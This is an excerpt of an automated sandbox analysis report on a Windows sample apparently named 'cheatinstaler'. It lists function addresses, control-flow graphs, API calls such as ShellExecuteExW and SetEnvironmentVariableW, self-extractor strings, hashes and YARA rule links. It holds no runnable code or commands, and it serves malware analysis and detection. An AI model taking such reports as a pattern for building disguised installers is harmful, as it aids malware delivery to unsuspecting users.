                                                                                                  • Opcode ID: c1941742baf2d9c3be52f390a0a923855bad3b4b9f203786c8d0fad0fa7aba42
                                                                                                  • Instruction ID: d7cf854d2d8fa313f87b732558c737960786e6daa4bcd6aca25e207932b18579
                                                                                                  • Opcode Fuzzy Hash: c1941742baf2d9c3be52f390a0a923855bad3b4b9f203786c8d0fad0fa7aba42
                                                                                                  • Instruction Fuzzy Hash: F662BF22A1969285EF10EF26D4682BD2365FF44789F808136DADE877D5EF3CE544E340
                                                                                                  Function 00007FF6C16E1900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1911 7ff6c16e1900-7ff6c16e1989 call 7ff6c16e1558 1914 7ff6c16e19b4-7ff6c16e19d1 1911->1914 1915 7ff6c16e198b-7ff6c16e19af call 7ff6c16e1868 RaiseException 1911->1915 1917 7ff6c16e19d3-7ff6c16e19e4 1914->1917 1918 7ff6c16e19e6-7ff6c16e19ea 1914->1918 1921 7ff6c16e1bb8-7ff6c16e1bd5 1915->1921 1920 7ff6c16e19ed-7ff6c16e19f9 1917->1920 1918->1920 1922 7ff6c16e19fb-7ff6c16e1a0d 1920->1922 1923 7ff6c16e1a1a-7ff6c16e1a1d 1920->1923 1935 7ff6c16e1a13 1922->1935 1936 7ff6c16e1b89-7ff6c16e1b93 1922->1936 1924 7ff6c16e1a23-7ff6c16e1a26 1923->1924 1925 7ff6c16e1ac4-7ff6c16e1acb 1923->1925 1928 7ff6c16e1a3d-7ff6c16e1a52 LoadLibraryExA 1924->1928 1929 7ff6c16e1a28-7ff6c16e1a3b 1924->1929 1926 7ff6c16e1adf-7ff6c16e1ae2 1925->1926 1927 7ff6c16e1acd-7ff6c16e1adc 1925->1927 1931 7ff6c16e1b85 1926->1931 1932 7ff6c16e1ae8-7ff6c16e1aec 1926->1932 1927->1926 1933 7ff6c16e1a54-7ff6c16e1a67 GetLastError 1928->1933 1934 7ff6c16e1aa9-7ff6c16e1ab2 1928->1934 1929->1928 1929->1934 1931->1936 1939 7ff6c16e1aee-7ff6c16e1af2 1932->1939 1940 7ff6c16e1b1b-7ff6c16e1b2e GetProcAddress 1932->1940 1941 7ff6c16e1a7e-7ff6c16e1aa4 call 7ff6c16e1868 RaiseException 1933->1941 1942 7ff6c16e1a69-7ff6c16e1a7c 1933->1942 1945 7ff6c16e1ab4-7ff6c16e1ab7 FreeLibrary 1934->1945 1946 7ff6c16e1abd 1934->1946 1935->1923 1943 7ff6c16e1b95-7ff6c16e1ba6 1936->1943 1944 7ff6c16e1bb0 call 7ff6c16e1868 1936->1944 1939->1940 1947 7ff6c16e1af4-7ff6c16e1aff 1939->1947 1940->1931 1950 7ff6c16e1b30-7ff6c16e1b43 GetLastError 1940->1950 1941->1921 1942->1934 1942->1941 1943->1944 1953 7ff6c16e1bb5 1944->1953 1945->1946 1946->1925 1947->1940 1951 7ff6c16e1b01-7ff6c16e1b08 1947->1951 1955 7ff6c16e1b45-7ff6c16e1b58 1950->1955 1956 7ff6c16e1b5a-7ff6c16e1b81 call 7ff6c16e1868 RaiseException call 7ff6c16e1558 1950->1956 1951->1940 1958 7ff6c16e1b0a-7ff6c16e1b0f 1951->1958 1953->1921 1955->1931 1955->1956 1956->1931 1958->1940 1960 7ff6c16e1b11-7ff6c16e1b19 1958->1960 1960->1931 1960->1940
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                                  • String ID: H
                                                                                                  • API String ID: 3432403771-2852464175
                                                                                                  • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                                  • Instruction ID: e1dca8b991296e2cf5584c993aebd3b58ccfa4125b11f3a6365251b6b6262fec
                                                                                                  • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                                  • Instruction Fuzzy Hash: 98916822B04B128AEB50CFA6D8446AC33B5FF09B9AB044235DEDD97754EF38E545E340
                                                                                                  Function 00007FF6C16DF4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1991 7ff6c16df4e0-7ff6c16df523 1992 7ff6c16df894-7ff6c16df8b9 call 7ff6c16b1fa0 call 7ff6c16e2320 1991->1992 1993 7ff6c16df529-7ff6c16df565 call 7ff6c16e3cf0 1991->1993 1999 7ff6c16df56a-7ff6c16df571 1993->1999 2000 7ff6c16df567 1993->2000 2002 7ff6c16df573-7ff6c16df577 1999->2002 2003 7ff6c16df582-7ff6c16df586 1999->2003 2000->1999 2004 7ff6c16df57c-7ff6c16df580 2002->2004 2005 7ff6c16df579 2002->2005 2006 7ff6c16df58b-7ff6c16df596 2003->2006 2007 7ff6c16df588 2003->2007 2004->2006 2005->2004 2008 7ff6c16df59c 2006->2008 2009 7ff6c16df628 2006->2009 2007->2006 2011 7ff6c16df5a2-7ff6c16df5a9 2008->2011 2010 7ff6c16df62c-7ff6c16df62f 2009->2010 2012 7ff6c16df631-7ff6c16df635 2010->2012 2013 7ff6c16df637-7ff6c16df63a 2010->2013 2014 7ff6c16df5ae-7ff6c16df5b3 2011->2014 2015 7ff6c16df5ab 2011->2015 2012->2013 2018 7ff6c16df660-7ff6c16df673 call 7ff6c16c63ac 2012->2018 2013->2018 2019 7ff6c16df63c-7ff6c16df643 2013->2019 2016 7ff6c16df5e5-7ff6c16df5f0 2014->2016 2017 7ff6c16df5b5 2014->2017 2015->2014 2023 7ff6c16df5f2 2016->2023 2024 7ff6c16df5f5-7ff6c16df5fa 2016->2024 2020 7ff6c16df5ca-7ff6c16df5d0 2017->2020 2034 7ff6c16df675-7ff6c16df693 call 7ff6c16d13c4 2018->2034 2035 7ff6c16df698-7ff6c16df6ed call 7ff6c16e797c call 7ff6c16b129c call 7ff6c16c32a8 call 7ff6c16b1fa0 2018->2035 2019->2018 2021 7ff6c16df645-7ff6c16df65c 2019->2021 2025 7ff6c16df5d2 2020->2025 2026 7ff6c16df5b7-7ff6c16df5be 2020->2026 2021->2018 2023->2024 2028 7ff6c16df600-7ff6c16df607 2024->2028 2029 7ff6c16df8ba-7ff6c16df8c1 2024->2029 2025->2016 2030 7ff6c16df5c3-7ff6c16df5c8 2026->2030 2031 7ff6c16df5c0 2026->2031 2036 7ff6c16df60c-7ff6c16df612 2028->2036 2037 7ff6c16df609 2028->2037 2032 7ff6c16df8c3 2029->2032 2033 7ff6c16df8c6-7ff6c16df8cb 2029->2033 2030->2020 2039 7ff6c16df5d4-7ff6c16df5db 2030->2039 2031->2030 2032->2033 2040 7ff6c16df8de-7ff6c16df8e6 2033->2040 2041 7ff6c16df8cd-7ff6c16df8d4 2033->2041 2034->2035 2058 7ff6c16df742-7ff6c16df74f ShellExecuteExW 2035->2058 2059 7ff6c16df6ef-7ff6c16df73d call 7ff6c16e797c call 7ff6c16b129c call 7ff6c16c5b60 call 7ff6c16b1fa0 2035->2059 2036->2029 2038 7ff6c16df618-7ff6c16df622 2036->2038 2037->2036 2038->2009 2038->2011 2044 7ff6c16df5e0 2039->2044 2045 7ff6c16df5dd 2039->2045 2048 7ff6c16df8eb-7ff6c16df8f6 2040->2048 2049 7ff6c16df8e8 2040->2049 2046 7ff6c16df8d6 2041->2046 2047 7ff6c16df8d9 2041->2047 2044->2016 2045->2044 2046->2047 2047->2040 2048->2010 2049->2048 2060 7ff6c16df755-7ff6c16df75f 2058->2060 2061 7ff6c16df846-7ff6c16df84e 2058->2061 2059->2058 2063 7ff6c16df76f-7ff6c16df772 2060->2063 2064 7ff6c16df761-7ff6c16df764 2060->2064 2066 7ff6c16df882-7ff6c16df88f 2061->2066 2067 7ff6c16df850-7ff6c16df866 2061->2067 2069 7ff6c16df774-7ff6c16df77f call 7ff6c171e188 2063->2069 2070 7ff6c16df78e-7ff6c16df7ad call 7ff6c171e1b8 call 7ff6c16dfe24 2063->2070 2064->2063 2068 7ff6c16df766-7ff6c16df76d 2064->2068 2066->1992 2072 7ff6c16df87d call 7ff6c16e220c 2067->2072 2073 7ff6c16df868-7ff6c16df87b 2067->2073 2068->2063 2074 7ff6c16df7e3-7ff6c16df7f0 CloseHandle 2068->2074 2069->2070 2090 7ff6c16df781-7ff6c16df78c ShowWindow 2069->2090 2070->2074 2099 7ff6c16df7af-7ff6c16df7b2 2070->2099 2072->2066 2073->2072 2078 7ff6c16df8fb-7ff6c16df903 call 7ff6c16e7904 2073->2078 2080 7ff6c16df7f2-7ff6c16df803 call 7ff6c16d13c4 2074->2080 2081 7ff6c16df805-7ff6c16df80c 2074->2081 2080->2081 2088 7ff6c16df82e-7ff6c16df830 2080->2088 2081->2088 2089 7ff6c16df80e-7ff6c16df811 2081->2089 2088->2061 2095 7ff6c16df832-7ff6c16df835 2088->2095 2089->2088 2094 7ff6c16df813-7ff6c16df828 2089->2094 2090->2070 2094->2088 2095->2061 2098 7ff6c16df837-7ff6c16df845 ShowWindow 2095->2098 2098->2061 2099->2074 2101 7ff6c16df7b4-7ff6c16df7c5 GetExitCodeProcess 2099->2101 2101->2074 2102 7ff6c16df7c7-7ff6c16df7dc 2101->2102 2102->2074
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: .exe$.inf$Install$p
                                                                                                  • API String ID: 1054546013-3607691742
                                                                                                  • Opcode ID: bd083846a701d2a936ecc778425380adf73900159b5be9ae941c3623c510174f
                                                                                                  • Instruction ID: ba380088b11c62655b69a318d3d6943d4165fed163de26730223a61792de494a
                                                                                                  • Opcode Fuzzy Hash: bd083846a701d2a936ecc778425380adf73900159b5be9ae941c3623c510174f
                                                                                                  • Instruction Fuzzy Hash: D4C18F62F1860295FB10DF27E9502B923B1AF95B82F6440B1DACDC7BA5DF3CE4929340
                                                                                                  Function 00007FF6C16DF0A4 Relevance: 16.6, APIs: 11, Instructions: 102COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 4119318379-0
                                                                                                  • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                                  • Instruction ID: 67b7d9805271181ae970d12952c0b4cd436be142906249843c76d14e4e3bc2b0
                                                                                                  • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                                  • Instruction Fuzzy Hash: CE41D531B1464286F700DF62E820BAE3360EB89B9AF641135DD8E47B96CF7DD4458764
                                                                                                  Function 00007FF6C16BEF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: e994a9db728abc9e3b7c2f1aeddd0c1bbb8b4fdc17eb45be45aeabee48c93372
                                                                                                  • Instruction ID: dc609190e75a2c92d0de149e3f6e4a4a8ed1cad562f3d9f0642dc69cb0807824
                                                                                                  • Opcode Fuzzy Hash: e994a9db728abc9e3b7c2f1aeddd0c1bbb8b4fdc17eb45be45aeabee48c93372
                                                                                                  • Instruction Fuzzy Hash: 5212D262F0874184EB10CF66D4442AD6372EB457A9F404276EADC97AEADF3CE586E340
                                                                                                  Function 00007FF6C16C24C0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 3765 7ff6c16c24c0-7ff6c16c24fb 3766 7ff6c16c2506 3765->3766 3767 7ff6c16c24fd-7ff6c16c2504 3765->3767 3768 7ff6c16c2509-7ff6c16c2578 3766->3768 3767->3766 3767->3768 3769 7ff6c16c257d-7ff6c16c25a8 CreateFileW 3768->3769 3770 7ff6c16c257a 3768->3770 3771 7ff6c16c25ae-7ff6c16c25de GetLastError call 7ff6c16c6a0c 3769->3771 3772 7ff6c16c2688-7ff6c16c268d 3769->3772 3770->3769 3781 7ff6c16c25e0-7ff6c16c262a CreateFileW GetLastError 3771->3781 3782 7ff6c16c262c 3771->3782 3773 7ff6c16c2693-7ff6c16c2697 3772->3773 3775 7ff6c16c26a5-7ff6c16c26a9 3773->3775 3776 7ff6c16c2699-7ff6c16c269c 3773->3776 3779 7ff6c16c26cf-7ff6c16c26e3 3775->3779 3780 7ff6c16c26ab-7ff6c16c26af 3775->3780 3776->3775 3778 7ff6c16c269e 3776->3778 3778->3775 3784 7ff6c16c26e5-7ff6c16c26f0 3779->3784 3785 7ff6c16c270c-7ff6c16c2735 call 7ff6c16e2320 3779->3785 3780->3779 3783 7ff6c16c26b1-7ff6c16c26c9 SetFileTime 3780->3783 3786 7ff6c16c2632-7ff6c16c263a 3781->3786 3782->3786 3783->3779 3788 7ff6c16c26f2-7ff6c16c26fa 3784->3788 3789 7ff6c16c2708 3784->3789 3790 7ff6c16c2673-7ff6c16c2686 3786->3790 3791 7ff6c16c263c-7ff6c16c2653 3786->3791 3793 7ff6c16c26ff-7ff6c16c2703 call 7ff6c16b20b0 3788->3793 3794 7ff6c16c26fc 3788->3794 3789->3785 3790->3773 3795 7ff6c16c266e call 7ff6c16e220c 3791->3795 3796 7ff6c16c2655-7ff6c16c2668 3791->3796 3793->3789 3794->3793 3795->3790 3796->3795 3797 7ff6c16c2736-7ff6c16c273b call 7ff6c16e7904 3796->3797
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3536497005-0
                                                                                                  • Opcode ID: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
                                                                                                  • Instruction ID: 1d5c95053de4f57f5608424e503a3894dd3efcf03ed7ce7ed97c904cc72e2ddc
                                                                                                  • Opcode Fuzzy Hash: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
                                                                                                  • Instruction Fuzzy Hash: 7D61F266A1878186EB209F2AE45036E67A1BB857A8F101338DEE943AD8DF3DD054D744
                                                                                                  Function 00007FF6C16DFD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 3802 7ff6c16dfd0c-7ff6c16dfd37 3803 7ff6c16dfd3c-7ff6c16dfd76 SetEnvironmentVariableW call 7ff6c16cd0a0 3802->3803 3804 7ff6c16dfd39 3802->3804 3807 7ff6c16dfdc3-7ff6c16dfdcb 3803->3807 3808 7ff6c16dfd78 3803->3808 3804->3803 3810 7ff6c16dfdff-7ff6c16dfe1a call 7ff6c16e2320 3807->3810 3811 7ff6c16dfdcd-7ff6c16dfde3 3807->3811 3809 7ff6c16dfd7c-7ff6c16dfd84 3808->3809 3813 7ff6c16dfd86 3809->3813 3814 7ff6c16dfd89-7ff6c16dfd94 call 7ff6c16cd4c0 3809->3814 3815 7ff6c16dfde5-7ff6c16dfdf8 3811->3815 3816 7ff6c16dfdfa call 7ff6c16e220c 3811->3816 3813->3814 3824 7ff6c16dfda3-7ff6c16dfda8 3814->3824 3825 7ff6c16dfd96-7ff6c16dfda1 3814->3825 3815->3816 3819 7ff6c16dfe1b-7ff6c16dfe23 call 7ff6c16e7904 3815->3819 3816->3810 3826 7ff6c16dfdaa 3824->3826 3827 7ff6c16dfdad-7ff6c16dfdc2 SetEnvironmentVariableW 3824->3827 3825->3809 3826->3827 3827->3807
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: sfxcmd$sfxpar
                                                                                                  • API String ID: 3540648995-3493335439
                                                                                                  • Opcode ID: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
                                                                                                  • Instruction ID: 7462bcf18850036b8d49be627d27291dfdf8c8a39fcae0157203e015f7239e26
                                                                                                  • Opcode Fuzzy Hash: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
                                                                                                  • Instruction Fuzzy Hash: 7E319032A14A1684EF00DF6AE8841AC3371FB48B99F140171DEED977A9DF38E182D344
                                                                                                  Function 00007FF6C16DB014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                                                  • String ID: ]
                                                                                                  • API String ID: 2347093688-3352871620
                                                                                                  • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                                  • Instruction ID: 0e2aa29ca81e46c6c517667a060886190d01b09b1233e566492f145b896ca6f6
                                                                                                  • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                                  • Instruction Fuzzy Hash: 4B118621B0964242FF64FF23A6587795392AF89BC6F280034DDDD87B9ADE2CE814D700
                                                                                                  Function 00007FF6C16DAE1C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1266772231-0
                                                                                                  • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                                  • Instruction ID: 5e73a8bcca8494c47fc6de15bd20d685c0880ec123a3783e5799b8dc60bda1d4
                                                                                                  • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                                  • Instruction Fuzzy Hash: DEF0F936B3854282FB519F22E8A5A766361FFD0B46FA05431EACEC2955DF2CD508EB10
                                                                                                  Function 00007FF6C16D91E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                  • String ID: EDIT
                                                                                                  • API String ID: 4243998846-3080729518
                                                                                                  • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                                  • Instruction ID: d8ce63009127d746acdfba25e33428f8e57e8bb01dca4c8e05ee64f7d844cf77
                                                                                                  • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                                  • Instruction Fuzzy Hash: 20018161B18A8381FB209F23F8207F66390AF99746F544031CDCE87755DE3CE149EA50
                                                                                                  Function 00007FF6C16C2CE0 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
